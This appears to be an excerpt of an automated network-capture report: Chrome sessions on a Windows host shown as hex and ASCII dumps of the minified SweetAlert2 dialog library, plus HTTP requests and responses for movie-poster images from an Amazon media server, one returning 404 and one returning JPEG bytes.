                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 72 6f 67 72 65 73 73 2d 73 74 65 70 22 2c 22 70 72 6f 67 72 65 73 73 2d 73 74 65 70 2d 6c 69 6e 65 22 2c 22 6c 6f 61 64 65 72 22 2c 22 6c 6f 61 64 69 6e 67 22 2c 22 73 74 79 6c 65 64 22 2c 22 74 6f 70 22 2c 22 74 6f 70 2d 73 74 61 72 74 22 2c 22 74 6f 70 2d 65 6e 64 22 2c 22 74 6f 70 2d 6c 65 66 74 22 2c 22 74 6f 70 2d 72 69 67 68 74 22 2c 22 63 65 6e 74 65 72 22 2c 22 63 65 6e 74 65 72 2d 73 74 61 72 74 22 2c 22 63 65 6e 74 65 72 2d 65 6e 64 22 2c 22 63 65 6e 74 65 72 2d 6c 65 66 74 22 2c 22 63 65 6e 74 65 72 2d 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 62 6f 74 74 6f 6d 2d 73 74 61 72 74 22 2c 22 62 6f 74 74 6f 6d 2d 65 6e 64 22 2c 22 62 6f 74 74 6f 6d 2d 6c 65 66 74 22 2c 22 62 6f 74 74 6f 6d 2d 72 69 67 68 74 22 2c 22 67 72 6f 77 2d 72 6f 77
                                                                                                                                                                                          Data Ascii: rogress-step","progress-step-line","loader","loading","styled","top","top-start","top-end","top-left","top-right","center","center-start","center-end","center-left","center-right","bottom","bottom-start","bottom-end","bottom-left","bottom-right","grow-row
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 74 69 6f 6e 73 7d 20 2e 24 7b 72 2e 63 6f 6e 66 69 72 6d 7d 60 29 2c 50 3d 28 29 3d 3e 76 28 60 2e 24 7b 72 2e 61 63 74 69 6f 6e 73 7d 20 2e 24 7b 72 2e 63 61 6e 63 65 6c 7d 60 29 2c 54 3d 28 29 3d 3e 76 28 60 2e 24 7b 72 2e 61 63 74 69 6f 6e 73 7d 20 2e 24 7b 72 2e 64 65 6e 79 7d 60 29 2c 53 3d 28 29 3d 3e 76 28 60 2e 24 7b 72 2e 6c 6f 61 64 65 72 7d 60 29 2c 4f 3d 28 29 3d 3e 77 28 72 2e 61 63 74 69 6f 6e 73 29 2c 4d 3d 28 29 3d 3e 77 28 72 2e 66 6f 6f 74 65 72 29 2c 6a 3d 28 29 3d 3e 77 28 72 5b 22 74 69 6d 65 72 2d 70 72 6f 67 72 65 73 73 2d 62 61 72 22 5d 29 2c 48 3d 28 29 3d 3e 77 28 72 2e 63 6c 6f 73 65 29 2c 49 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 43 28 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 5b 5d 3b 63 6f 6e 73 74 20 74 3d 65 2e 71 75 65
                                                                                                                                                                                          Data Ascii: tions} .${r.confirm}`),P=()=>v(`.${r.actions} .${r.cancel}`),T=()=>v(`.${r.actions} .${r.deny}`),S=()=>v(`.${r.loader}`),O=()=>w(r.actions),M=()=>w(r.footer),j=()=>w(r["timer-progress-bar"]),H=()=>w(r.close),I=()=>{const e=C();if(!e)return[];const t=e.que
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 7d 29 29 7d 7d 2c 4e 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6e 3d 74 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 29 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 69 66 28 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 6e 5b 74 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 5f 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 69 66 28 28 28 65 2c 74 29 3d 3e 7b 41 72 72 61 79 2e 66 72 6f 6d 28 65 2e 63 6c 61 73 73 4c 69 73 74 29 2e 66 6f 72 45 61 63 68 28 28 6e 3d 3e 7b 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 72 29 2e 69 6e 63 6c 75 64 65 73 28 6e 29 7c 7c 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 61 29 2e 69 6e 63 6c 75 64 65 73 28 6e 29 7c 7c 4f 62 6a
                                                                                                                                                                                          Data Ascii: }))}},N=(e,t)=>{if(!t)return!1;const n=t.split(/\s+/);for(let t=0;t<n.length;t++)if(!e.classList.contains(n[t]))return!1;return!0},_=(e,t,n)=>{if(((e,t)=>{Array.from(e.classList).forEach((n=>{Object.values(r).includes(n)||Object.values(a).includes(n)||Obj
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 6e 67 74 68 3b 65 2b 2b 29 7b 63 6f 6e 73 74 20 6f 3d 6e 5b 65 5d 3b 69 66 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 4e 28 6f 2c 74 29 29 72 65 74 75 72 6e 20 6f 7d 7d 2c 59 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 3d 3d 3d 60 24 7b 70 61 72 73 65 49 6e 74 28 6e 29 7d 60 26 26 28 6e 3d 70 61 72 73 65 49 6e 74 28 6e 29 29 2c 6e 7c 7c 30 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 29 3f 65 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 24 7b 6e 7d 70 78 60 3a 6e 29 3a 65 2e 73 74 79 6c 65 2e 72 65 6d 6f 76 65 50 72 6f 70 65 72 74 79 28 74 29 7d 2c 58 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68
                                                                                                                                                                                          Data Ascii: ngth;e++){const o=n[e];if(o instanceof HTMLElement&&N(o,t))return o}},Y=(e,t,n)=>{n===`${parseInt(n)}`&&(n=parseInt(n)),n||0===parseInt(n)?e.style.setProperty(t,"number"==typeof n?`${n}px`:n):e.style.removeProperty(t)},X=function(e){let t=arguments.length
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 7b 72 2e 63 6c 6f 73 65 7d 22 3e 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 24 7b 72 5b 22 70 72 6f 67 72 65 73 73 2d 73 74 65 70 73 22 5d 7d 22 3e 3c 2f 75 6c 3e 5c 6e 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 24 7b 72 2e 69 63 6f 6e 7d 22 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 24 7b 72 2e 69 6d 61 67 65 7d 22 20 2f 3e 5c 6e 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 24 7b 72 2e 74 69 74 6c 65 7d 22 20 69 64 3d 22 24 7b 72 2e 74 69 74 6c 65 7d 22 3e 3c 2f 68 32 3e 5c 6e 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 24 7b 72 5b 22 68 74 6d 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 5d 7d 22 20 69 64 3d 22 24 7b 72 5b 22 68 74 6d 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 5d 7d 22 3e 3c 2f 64 69 76 3e 5c
                                                                                                                                                                                          Data Ascii: {r.close}"></button>\n <ul class="${r["progress-steps"]}"></ul>\n <div class="${r.icon}"></div>\n <img class="${r.image}" />\n <h2 class="${r.title}" id="${r.title}"></h2>\n <div class="${r["html-container"]}" id="${r["html-container"]}"></div>\
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 5d 2c 5b 72 5b 22 6e 6f 2d 62 61 63 6b 64 72 6f 70 22 5d 2c 72 5b 22 74 6f 61 73 74 2d 73 68 6f 77 6e 22 5d 2c 72 5b 22 68 61 73 2d 63 6f 6c 75 6d 6e 22 5d 5d 29 2c 21 30 29 7d 29 28 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 28 22 53 77 65 65 74 41 6c 65 72 74 32 20 72 65 71 75 69 72 65 73 20 64 6f 63 75 6d 65 6e 74 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 22 29 3b 63 6f 6e 73 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64
                                                                                                                                                                                          Data Ascii: document.documentElement,document.body],[r["no-backdrop"],r["toast-shown"],r["has-column"]]),!0)})();if("undefined"==typeof window||"undefined"==typeof document)return void d("SweetAlert2 requires document to initialize");const n=document.createElement("d
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 22 61 63 74 69 6f 6e 73 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 20 6f 3d 78 28 29 2c 69 3d 54 28 29 2c 73 3d 50 28 29 3b 69 66 28 21 6f 7c 7c 21 69 7c 7c 21 73 29 72 65 74 75 72 6e 3b 64 65 28 6f 2c 22 63 6f 6e 66 69 72 6d 22 2c 6e 29 2c 64 65 28 69 2c 22 64 65 6e 79 22 2c 6e 29 2c 64 65 28 73 2c 22 63 61 6e 63 65 6c 22 2c 6e 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 6f 29 7b 69 66 28 21 6f 2e 62 75 74 74 6f 6e 73 53 74 79 6c 69 6e 67 29 72 65 74 75 72 6e 20 76 6f 69 64 20 57 28 5b 65 2c 74 2c 6e 5d 2c 72 2e 73 74 79 6c 65 64 29 3b 7a 28 5b 65 2c 74 2c 6e 5d 2c 72 2e 73 74 79 6c 65 64 29 2c 6f 2e 63 6f 6e 66 69 72 6d 42 75 74 74 6f 6e 43 6f 6c 6f 72 26 26 28 65 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43
                                                                                                                                                                                          Data Ascii: "actions"),function(e,t,n){const o=x(),i=T(),s=P();if(!o||!i||!s)return;de(o,"confirm",n),de(i,"deny",n),de(s,"cancel",n),function(e,t,n,o){if(!o.buttonsStyling)return void W([e,t,n],r.styled);z([e,t,n],r.styled),o.confirmButtonColor&&(e.style.backgroundC
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 2c 22 74 65 78 74 61 72 65 61 22 5d 2c 67 65 3d 65 3d 3e 7b 69 66 28 21 65 2e 69 6e 70 75 74 29 72 65 74 75 72 6e 3b 69 66 28 21 41 65 5b 65 2e 69 6e 70 75 74 5d 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 28 60 55 6e 65 78 70 65 63 74 65 64 20 74 79 70 65 20 6f 66 20 69 6e 70 75 74 21 20 45 78 70 65 63 74 65 64 20 24 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 41 65 29 2e 6a 6f 69 6e 28 22 20 7c 20 22 29 7d 2c 20 67 6f 74 20 22 24 7b 65 2e 69 6e 70 75 74 7d 22 60 29 3b 63 6f 6e 73 74 20 74 3d 77 65 28 65 2e 69 6e 70 75 74 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6e 3d 41 65 5b 65 2e 69 6e 70 75 74 5d 28 74 2c 65 29 3b 58 28 74 29 2c 65 2e 69 6e 70 75 74 41 75 74 6f 46 6f 63 75 73 26 26 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 7b 52
                                                                                                                                                                                          Data Ascii: ,"textarea"],ge=e=>{if(!e.input)return;if(!Ae[e.input])return void d(`Unexpected type of input! Expected ${Object.keys(Ae).join(" | ")}, got "${e.input}"`);const t=we(e.input);if(!t)return;const n=Ae[e.input](t,e);X(t),e.inputAutoFocus&&setTimeout((()=>{R
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 6e 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 22 29 2c 6f 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6f 75 74 70 75 74 22 29 3b 72 65 74 75 72 6e 20 43 65 28 6e 2c 74 2e 69 6e 70 75 74 56 61 6c 75 65 29 2c 6e 2e 74 79 70 65 3d 74 2e 69 6e 70 75 74 2c 43 65 28 6f 2c 74 2e 69 6e 70 75 74 56 61 6c 75 65 29 2c 76 65 28 6e 2c 65 2c 74 29 2c 65 7d 2c 41 65 2e 73 65 6c 65 63 74 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 2c 74 2e 69 6e 70 75 74 50 6c 61 63 65 68 6f 6c 64 65 72 29 7b 63 6f 6e 73 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 3b 56 28 6e 2c 74 2e 69 6e 70 75 74 50 6c 61 63 65 68 6f 6c 64 65 72 29 2c 6e 2e 76 61
                                                                                                                                                                                          Data Ascii: n=e.querySelector("input"),o=e.querySelector("output");return Ce(n,t.inputValue),n.type=t.input,Ce(o,t.inputValue),ve(n,e,t),e},Ae.select=(e,t)=>{if(e.textContent="",t.inputPlaceholder){const n=document.createElement("option");V(n,t.inputPlaceholder),n.va


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          32192.168.2.1649749151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:58 UTC676OUTGET /images/M/MV5BN2FmNGYzMGQtZDI1MS00NTIwLWE4MzUtMzJlNDA5ZjRiMzhkXkEyXkFqcGdeQXVyNTUyMzE4Mzg@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:59 UTC526INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 9
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Expires: Sun, 15 Dec 2024 11:42:59 GMT
                                                                                                                                                                                          Cache-Control: max-age=300,public
                                                                                                                                                                                          X-Amz-IR-Id: 46152768-3a6b-4300-a0c8-89845d8c5ac9
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 0
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200070-IAD, cache-ewr-kewr1740034-EWR
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          X-Cache: MISS from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC9INData Raw: 4e 6f 74 20 46 6f 75 6e 64
                                                                                                                                                                                          Data Ascii: Not Found


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          33192.168.2.1649750151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:58 UTC676OUTGET /images/M/MV5BY2IzZGY2YmEtYzljNS00NTM5LTgwMzUtMzM1NjQ4NGI0OTk0XkEyXkFqcGdeQXVyNDYyMDk5MTU@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:59 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 28953
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 403f66df-866b-46b3-95bd-aca3ed9a5e25
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 13 Jul 2016 19:43:40 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 06 Nov 2044 15:34:31 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1625171
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000105-IAD, cache-ewr-kewr1740022-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c4 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 05 06 07 08 04 03 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 02 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d8 a1 49 69 68 5a 40 98 df 29 f0 9d 49
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5IihZ@)I
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 18 7c cb 8a ca 22 f2 b7 42 3c 89 07 6b d4 f7 cc eb 1b ba d8 de a1 7b 1d 0c ef 69 0f 21 c6 9b 1d 1b a6 28 b6 b3 b7 71 7b f5 73 68 56 e8 8e 9c e5 eb 98 d1 f7 53 76 a3 5c 49 a6 12 24 eb 1c eb b9 d8 77 8c 0b 6a cb e5 12 be 1e 44 a1 9f b3 8e e3 dd 78 c3 68 69 00 05 64 9f 3f 44 a1 60 06 11 91 87 cc 88 c4 96 35 2b 00 00 84 9a 32 13 d8 b6 46 03 b4 f9 ba 74 ca 28 c9 54 e9 64 44 5e 65 4d 65 6a 93 b3 83 a7 97 a8 b9 fc 19 74 ca 98 e5 9c 9d d6 fc 9a 17 37 bf 1f 43 b7 a2 eb 13 40 5b 22 d0 bb 03 1c 46 b4 9b b3 47 45 56 91 d8 b9 0f 5e 00 00 5f 9d 24 64 85 00 18 46 00 7c c5 8d c8 a3 b2 a8 22 02 33 2b 71 38 f5 ff 00 3b 5f 2f 5f 83 cc 32 2f 8d dc 3c fc 6b 78 8e 64 4d c7 9c b7 8a 24 8a 4b d1 0b 7f 93 96 65 c7 df 3f b2 3c e5 9d 3c 5c 6e 28 2a 4b c7 a7 db 99 99 53 34 6b 29 df
                                                                                                                                                                                          Data Ascii: |"B<k{i!(q{shVSv\I$wjDxhid?D`5+2Ft(TdD^eMejt7C@["FGEV^_$dF|"3+q8;_/_2/<kxdM$Ke?<<\n(*KS4k)
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 0c 25 21 48 4e 68 d2 e9 cf 47 ce ff 00 7d 90 ef c9 ee 34 d8 00 76 fc f0 00 3c 1a 92 a0 32 32 05 91 80 24 2d 21 e4 00 05 a5 49 01 e9 e7 e8 00 00 0a 00 01 80 01 1e 9e 7e 80 00 00 80 09 1c 1e a0 33 c7 d8 04 25 00 30 00 00 fd 40 0f 70 00 05 00 06 40 21 40 06 02 00 3c 48 04 7a 20 00 35 00 01 40 30 c0 08 50 00 11 e8 00 10 00 3c c8 00 ff c4 00 35 10 00 02 01 03 03 02 04 05 04 02 02 01 05 00 00 00 01 02 03 00 04 11 05 12 13 14 21 10 22 30 31 20 23 32 33 34 06 15 35 41 24 40 25 42 51 43 50 52 53 61 ff da 00 08 01 01 00 01 08 02 f8 6e 66 10 46 d2 18 a7 de cc 9e 2b 2e e7 74 1f 15 c5 f2 41 9f 1d c3 3b 6a 29 96 61 95 f8 67 bb 8a df 1c 91 4a b2 8d c9 56 f7 6b 70 5c 2f ab 7f 01 9a 58 d6 a3 13 5a 8c ac b3 df 82 48 8a f6 69 7c c2 29 e7 51 38 27 51 98 77 ab 19 9a 75 de 7e
                                                                                                                                                                                          Data Ascii: %!HNhG}4v<22$-!I~3%0@p@!@<Hz 5@0P<5!"01 #2345A$@%BQCPRSanfF+.tA;j)agJVkp\/XZHi|)Q8'Qwu~
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 61 72 d8 70 6a 29 77 aa 51 3b cd 48 32 45 05 db 57 84 ef 35 6a db 5c 54 e2 46 38 a5 d2 a2 65 df 53 45 c3 f4 67 3e e5 3b 64 47 1e f3 5a 37 e6 ae 3d 1b ef bf 3f 82 44 5a ad ad 18 54 7e 41 5d 57 14 b9 61 b7 de 9e 5c 9c 08 6d 31 dd b5 2c 6f ed 62 c2 44 22 ac a3 68 f9 37 df c4 06 d6 a3 84 b6 22 ac 9f 92 25 ab 91 e6 ab 0c 30 15 e4 5d c0 f1 76 c8 24 ff 00 db 50 04 3f 78 97 24 54 30 87 40 1f 53 93 8f e5 ad cc 4b 20 dc a5 77 0d d5 61 18 92 55 06 fc af b0 d0 7f 2d 3d 2b ff 00 c8 9e 95 09 a8 62 35 c4 55 69 e3 53 8d e9 02 23 55 f5 e6 1b 68 46 04 0d b7 37 22 21 57 32 ab 56 9e fb 6a 46 f2 9c 5c 37 24 28 6a 78 4c 9b 30 8e 11 6a 79 37 35 46 1a 4c 2a cc d2 c5 c6 5e 59 c4 a1 5a 34 98 1e d5 a9 42 18 6f 09 8c d4 12 f9 3b 5c 9d c3 35 77 70 e4 a1 30 c9 e5 95 56 da 1e 8d 37 b5
                                                                                                                                                                                          Data Ascii: arpj)wQ;H2EW5j\TF8eSEg>;dGZ7=?DZT~A]Wa\m1,obD"h7"%0]v$P?x$T0@SK waU-=+b5UiS#UhF7"!W2VjF\7$(jxL0jy75FL*^YZ4Bo;\5wp0V7
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: a8 8e ba 60 e2 32 b7 9d e7 9b 19 c7 61 a1 26 27 53 e9 5e fd f9 be 1b 5b 8e 07 dd 56 97 a2 63 8a 3e 19 f0 96 47 70 56 2f dc d9 53 0a 4e 4e 69 97 d8 50 ec c2 a5 8c f1 ef ab 0f fb 3d 45 1a 49 89 43 43 b8 54 32 6f 1f 04 f0 72 90 68 ff 00 83 6f 23 36 6a 24 cd 68 cd 9b 85 c7 a3 79 f7 a6 f8 a3 62 a7 b4 5a 8c e2 85 fc af ed 17 51 25 08 3f f9 28 18 c0 70 d1 33 a9 c5 0e de 0e db d6 34 ab 69 4f 99 10 5f b4 03 e6 47 7b 1c 9e d8 1e fe 19 f0 ca fd 47 58 d4 85 c9 d9 1d 6e fe ab 42 4d ae 3d 2b cf bd 37 c5 67 67 24 fd d6 2d 30 8f a9 6d 95 7c 31 5b 2a ea d5 2e 06 24 9e 06 b7 72 8d e1 6c 41 84 35 41 6e e3 26 3b 7b 64 7f b8 b6 50 7b 84 5d 9d bc 31 42 b5 90 d7 52 6c 49 23 68 ce 1a 85 68 c9 f3 55 bd 2b cf bd 37 c3 61 a6 f2 e1 e4 e4 54 00 01 38 35 25 d0 14 b7 db 8d 2b e6 b9 40
                                                                                                                                                                                          Data Ascii: `2a&'S^[Vc>GpV/SNNiP=EICCT2orho#6j$hybZQ%?(p34iO_G{GXnBM=+7gg$-0m|1[*.$rlA5An&;{dP{]1BRlI#hhU+7aT85%+@
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: d9 02 5b 6c d3 a1 1c 93 6b 8c 7e dd b5 e2 5c 02 ca 9a b3 c9 38 0b a8 ea 46 53 b2 3d 09 9b 32 0a bf d5 f6 65 22 96 69 5b b3 e9 8c 2d ed 83 49 3e bb ff 00 d7 61 aa f3 36 d9 3d 19 2d b0 ee 6a dd 3b d6 a3 60 81 37 30 14 06 6a 4b 77 88 65 ed a4 29 22 11 1c 7b 3e 15 75 7c ed d7 a4 fb 69 56 37 29 6c fb d8 5f 2c d0 49 22 ab 6d c1 ab 38 85 b2 75 32 a2 4b 7f 2d 4b 1e d7 28 97 ee 2d 61 4b 65 ab 88 c4 58 4a 76 e8 ad 95 06 95 67 bf 33 34 56 ed 31 32 cb 2c b2 5f 48 00 bc 81 2d 40 8e b4 6b 2c 0e 66 f4 6f e4 e9 b0 4d 83 15 56 32 dd dd 1b 97 cd 5b 5a b5 cb 6d 5b 4b 04 b6 1e 5b eb 93 3c 86 b4 d8 b9 67 4f 81 98 28 c9 bf d5 1a 7f 2a 59 34 9c 88 89 ad 3e 67 c5 3a 14 c6 eb 77 c5 bd cd 69 10 2c d2 9d da c4 db e5 d9 59 1a 6d b5 59 3a c7 27 23 9c ca 25 99 f4 f8 fb b4 ad 6b 89 25
                                                                                                                                                                                          Data Ascii: [lk~\8FS=2e"i[-I>a6=-j;`70jKwe)"{>u|iV7)l_,I"m8u2K-K(-aKeXJvg34V12,_H-@k,foMV2[Zm[K[<gO(*Y4>g:wi,YmY:'#%k%
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ba 29 b2 ca 49 e7 46 5e 14 a6 24 9b a6 82 24 0a 08 c1 eb c6 49 69 a8 77 4e 46 c5 97 92 fa e6 c7 d0 64 38 24 27 82 8c b5 6b 18 dd ec ca bf de 2c ac 33 60 68 e2 90 6c 84 e5 68 af af 17 2b b7 d8 32 03 79 1b db f1 23 ea 2f 36 38 27 61 81 83 2e c2 40 57 ec 21 4a 5b c9 3f 63 f0 31 0d 62 b9 38 3c 64 a2 d8 75 ac 44 3e c0 95 78 05 94 66 a0 64 5c 92 31 de ed 40 73 40 02 cb fd f7 a3 19 1c aa d7 54 30 c2 09 b0 84 91 cf 83 44 1b 04 43 d1 20 ac 64 9d 68 0f 82 d6 39 88 0b 27 28 0c 26 c5 62 85 fd 59 91 7d 88 1c 59 5c 69 02 fc 2f 96 a3 25 fd 73 7b ab ac 38 91 b5 f1 7c 1c 41 c6 3a 55 62 f4 c4 fb fe 36 87 65 33 bc 8d 59 b6 44 fb 02 7c ca d8 a2 61 2b ea ce 05 27 02 81 ea b0 5f a0 ab 19 14 c1 08 18 46 08 43 31 6c 60 6a 84 15 a9 af 22 e1 45 96 75 63 ce e0 7a d9 6b 23 93 9d 70
